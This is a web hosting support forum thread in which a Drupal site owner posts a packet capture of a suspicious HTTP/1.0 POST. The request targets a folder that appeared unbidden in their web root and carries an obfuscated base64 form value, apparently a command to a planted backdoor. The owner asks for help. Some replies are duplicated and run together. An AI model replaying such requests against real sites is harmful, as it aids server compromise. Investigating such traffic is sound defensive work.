Total Length: 566
Identification: 0x6476 (25718)
Flags: 0x40, Don't fragment
Fragment Offset: 0
Time to Live: 53
Protocol: TCP (6)
Header Checksum: 0xb79e [validation disabled]
[Header checksum status: Unverified]
Source Address: 67.213.82.137
Destination Address: MYIP
Transmission Control Protocol, Src Port: 58882, Dst Port: 80, Seq: 60, Ack: 1, Len: 514
Source Port: 58882
Destination Port: 80
[Stream index: 21961]
[TCP Segment Len: 514]
Sequence Number: 60 (relative sequence number)
Sequence Number (raw): 418382583
[Next Sequence Number: 574 (relative sequence number)]
Acknowledgment Number: 1 (relative ack number)
Acknowledgment number (raw): 3179666920
1000 .... = Header Length: 32 bytes (8)
Flags: 0x018 (PSH, ACK)
000. .... .... = Reserved: Not set
...0 .... .... = Nonce: Not set
.... 0... .... = Congestion Window Reduced (CWR): Not set
.... .0.. .... = ECN-Echo: Not set
.... ..0. .... = Urgent: Not set
.... ...1 .... = Acknowledgment: Set
.... .... 1... = Push: Set
.... .... .0.. = Reset: Not set
.... .... ..0. = Syn: Not set
.... .... ...0 = Fin: Not set
[TCP Flags: ·······AP···]
Window: 115
[Calculated window size: 14720]
[Window size scaling factor: 128]
Checksum: 0x2d9d [unverified]
[Checksum Status: Unverified]
Urgent Pointer: 0
Options: (12 bytes), No-Operation (NOP), No-Operation (NOP), Timestamps
TCP Option - No-Operation (NOP)
Kind: No-Operation (1)
TCP Option - No-Operation (NOP)
Kind: No-Operation (1)
TCP Option - Timestamps: TSval 3477825447, TSecr 43015397
Kind: Time Stamp Option (8)
Length: 10
Timestamp value: 3477825447
Timestamp echo reply: 43015397
[SEQ/ACK analysis]
[iRTT: 0.111636000 seconds]
[Bytes in flight: 514]
[Bytes sent since last PSH flag: 514]
[Timestamps]
[Time since first frame in this TCP stream: 0.223157000 seconds]
[Time since previous frame in this TCP stream: 0.110851000 seconds]
TCP payload (514 bytes)
TCP segment data (514 bytes)
[2 Reassembled TCP Segments (573 bytes): #1646719(59), #1646723(514)]
[Frame: 1646719, payload: 0-58 (59 bytes)]
[Frame: 1646723, payload: 59-572 (514 bytes)]
[Segment count: 2]
[Reassembled TCP length: 573]
[Reassembled TCP Data: 504f5354202f61706963686174706f6e672d776565726173657468616b756c2d65657475…]
Hypertext Transfer Protocol
POST /apichatpong-weerasethakul-eetuva/index.php HTTP/1.0\r\n
Host: www.mydomain.com\r\n
Connection: close\r\n
Referer: http://www.mydomain.com/apichatpong-wee ... ex.php\r\n
Content-Length: 151\r\n
[Content length: 151]
Content-Type: application/x-www-form-urlencoded\r\n
Accept-Language: en-US,en;q=0.8\r\n
User-Agent: Mozilla/5.0 (iPad; CPU OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1\r\n
\r\n
[Full request URI: http://www.mydomain.com/apichatpong-wee ... /index.php]
[HTTP request 1/1]
[Response in frame: 1646725]
File Data: 151 bytes
HTML Form URL Encoded: application/x-www-form-urlencoded
Form item: "nqxbpe" = "NnxyPGpzbHdvdSV1MC8jbCshJysgIWMpJSU5YWJtZC5jdyV0bDV7MysiNS4wNC91MC8jZishIi9taGdybyEheChgb3AgYXxhenN1NHQtN3A0MWliPG19eSNlIHwuYSwtZXEvaTNsKw=="
Key: nqxbpe
Value: NnxyPGpzbHdvdSV1MC8jbCshJysgIWMpJSU5YWJtZC5jdyV0bDV7MysiNS4wNC91MC8jZishIi9taGdybyEheChgb3AgYXxhenN1NHQtN3A0MWliPG19eSNlIHwuYSwtZXEvaTNsKw==
The problem is now in my public_html I have folder "apichatpong-weerasethakul-eetuva".
Any idea solve this problem?
Regards
D
-
- Support team
- Posts: 1111
- Joined: Tue Jul 30, 2013 10:18 pm
- Contact:
- Os: CentOS 6x
- Web: nginx + php-fpm
Re: Attack
Did you use Wordpress?
Re: Attack
Dear,
no, I'm using Drupal 7.78, but I don't think it's CMS problem, I think it's webserver problem, I'm using frontend nginx and backend apache.
My nginx:
https://www.sans.org/blog/http-request- ... e-proxies/
There are misconfiguration in my webserver I can't disable http 1.0 and attack use http 1.0.
Any idea solve problem?
Regards
no, I'm using Drupal 7.78, but I don't think it's CMS problem, I think it's webserver problem, I'm using frontend nginx and backend apache.
My nginx:
My apache:nginx version: nginx/1.16.0
built by gcc 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.4)
built with OpenSSL 1.1.0j 20 Nov 2018
TLS SNI support enabled
Maybe this is my problem:Server version: Apache/2.4.7 (Ubuntu)
Server built: Apr 3 2019 18:04:25
https://www.sans.org/blog/http-request- ... e-proxies/
There are misconfiguration in my webserver I can't disable http 1.0 and attack use http 1.0.
Any idea solve problem?
Regards